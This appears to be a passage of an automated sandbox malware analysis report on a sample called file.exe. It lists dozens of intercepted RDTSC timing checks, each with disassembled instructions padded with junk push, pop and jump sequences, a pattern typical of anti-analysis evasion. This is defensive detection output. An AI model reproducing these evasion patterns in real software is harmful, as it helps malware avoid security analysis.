                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CA41 second address: A9CA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CA45 second address: A9CA68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A4h 0x00000007 ja 00007F6B30D7C396h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CBE8 second address: A9CBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CBEE second address: A9CBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ebx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CD6A second address: A9CD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9EE78 second address: A9EE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3DB6 second address: AA3DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4271 second address: AA428A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F6B30D7C398h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F6B30D7C398h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4441 second address: AA4449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA466E second address: AA4679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6B30D7C396h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9EDC second address: AA9F38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F6B312295E6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F6B312295F5h 0x00000014 jmp 00007F6B312295F1h 0x00000019 js 00007F6B312295E6h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 js 00007F6B31229604h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6B312295F0h 0x0000002f jnp 00007F6B312295E6h 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6155E second address: A61564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61564 second address: A6157A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6B312295EFh 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6157A second address: A61588 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B30D7C396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61588 second address: A6158C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6158C second address: A6159A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6159A second address: A6159E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9444 second address: AA9451 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B30D7C396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9451 second address: AA9456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9456 second address: AA945C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA945C second address: AA9460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9A19 second address: AA9A23 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6B30D7C396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9B85 second address: AA9B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9B8B second address: AA9B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F6B30D7C396h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9B9E second address: AA9BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9D35 second address: AA9D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9D40 second address: AA9D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9D50 second address: AA9D5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 je 00007F6B30D7C396h 0x0000000d pop edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9D5E second address: AA9D68 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6B312295FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABD60 second address: AABD9B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B30D7C3A1h 0x00000008 jmp 00007F6B30D7C39Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F6B30D7C3A0h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007F6B30D7C39Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABD9B second address: AABD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABD9F second address: AABDDE instructions: 0x00000000 rdtsc 0x00000002 js 00007F6B30D7C396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jbe 00007F6B30D7C3A2h 0x00000013 jmp 00007F6B30D7C39Ch 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jbe 00007F6B30D7C3C7h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F6B30D7C3A4h 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACB51 second address: AACB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6B312295EBh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACB65 second address: AACB80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B30D7C3A7h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADE82 second address: AADE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADE87 second address: AADEE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx esi, cx 0x0000000e mov dword ptr [ebp+122D3D61h], edi 0x00000014 push 00000000h 0x00000016 mov esi, 3AEA9AAAh 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F6B30D7C398h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov di, 4E36h 0x0000003b jmp 00007F6B30D7C39Eh 0x00000040 push eax 0x00000041 pushad 0x00000042 push edx 0x00000043 push eax 0x00000044 pop eax 0x00000045 pop edx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF7C9 second address: AAF7CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF7CF second address: AAF7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB05A5 second address: AB05AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF7D3 second address: AAF7D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB10B7 second address: AB10BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB10BB second address: AB10C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB274F second address: AB2755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2755 second address: AB2768 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F6B30D7C3A0h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB45C5 second address: AB45CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6B312295E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB45CF second address: AB45EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A9h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64C10 second address: A64C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64C16 second address: A64C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64C1D second address: A64C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64C22 second address: A64C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F6B30D7C396h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64C33 second address: A64C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8122 second address: AB8128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8128 second address: AB812C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB837C second address: AB8381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9265 second address: AB9269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB20A second address: ABB20E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9269 second address: AB926F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB926F second address: AB9274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD3BF second address: ABD3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9274 second address: AB9287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6B30D7C396h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE239 second address: ABE25B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9287 second address: AB928C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE25B second address: ABE25F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB928C second address: AB9336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F6B30D7C398h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dword ptr [ebp+1246AA8Dh], edx 0x0000002a or dword ptr [ebp+122D1FD4h], ecx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov ebx, edx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 jmp 00007F6B30D7C39Fh 0x00000045 mov eax, dword ptr [ebp+122D1171h] 0x0000004b push 00000000h 0x0000004d push ebp 0x0000004e call 00007F6B30D7C398h 0x00000053 pop ebp 0x00000054 mov dword ptr [esp+04h], ebp 0x00000058 add dword ptr [esp+04h], 0000001Dh 0x00000060 inc ebp 0x00000061 push ebp 0x00000062 ret 0x00000063 pop ebp 0x00000064 ret 0x00000065 or ebx, 7AAEFE00h 0x0000006b push FFFFFFFFh 0x0000006d or dword ptr [ebp+122D2747h], esi 0x00000073 push eax 0x00000074 jc 00007F6B30D7C3ADh 0x0000007a pushad 0x0000007b jmp 00007F6B30D7C39Fh 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE25F second address: ABE265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD4A0 second address: ABD4B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B30D7C39Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE265 second address: ABE27C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B312295F3h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE27C second address: ABE280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF1AD second address: ABF1BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F6B312295E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE3AA second address: ABE3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE44C second address: ABE450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE450 second address: ABE46B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0E45 second address: AC0E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0E49 second address: AC0E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0E4D second address: AC0ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F6B312295F6h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F6B312295E8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c sub dword ptr [ebp+12474837h], ebx 0x00000032 jmp 00007F6B312295EDh 0x00000037 push 00000000h 0x00000039 call 00007F6B312295F5h 0x0000003e mov dword ptr [ebp+122D1CC9h], esi 0x00000044 pop ebx 0x00000045 push 00000000h 0x00000047 mov ebx, dword ptr [ebp+122D2F6Ch] 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F6B312295ECh 0x00000055 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC345E second address: AC3472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F6B30D7C396h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC3472 second address: AC3477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC3477 second address: AC348F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B30D7C3A4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC348F second address: AC34FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, eax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F6B312295E8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a or bx, 2C87h 0x0000002f push 00000000h 0x00000031 jnp 00007F6B312295EDh 0x00000037 mov bx, 4D07h 0x0000003b xchg eax, esi 0x0000003c push ecx 0x0000003d jng 00007F6B312295ECh 0x00000043 pop ecx 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC44DB second address: AC44FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F6B30D7C3A5h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC44FC second address: AC4500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4500 second address: AC4504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC01D4 second address: AC01DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC01DC second address: AC01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC01E0 second address: AC023A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6B312295E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F6B312295E6h 0x00000016 popad 0x00000017 pop edi 0x00000018 nop 0x00000019 stc 0x0000001a push dword ptr fs:[00000000h] 0x00000021 jc 00007F6B312295ECh 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e mov di, CE51h 0x00000032 mov eax, dword ptr [ebp+122D02E9h] 0x00000038 jmp 00007F6B312295EFh 0x0000003d push FFFFFFFFh 0x0000003f mov ebx, 555E26D1h 0x00000044 push eax 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC595D second address: AC5977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC86EB second address: AC86F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC86F7 second address: AC86FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC67F7 second address: AC67FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC797E second address: AC7982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
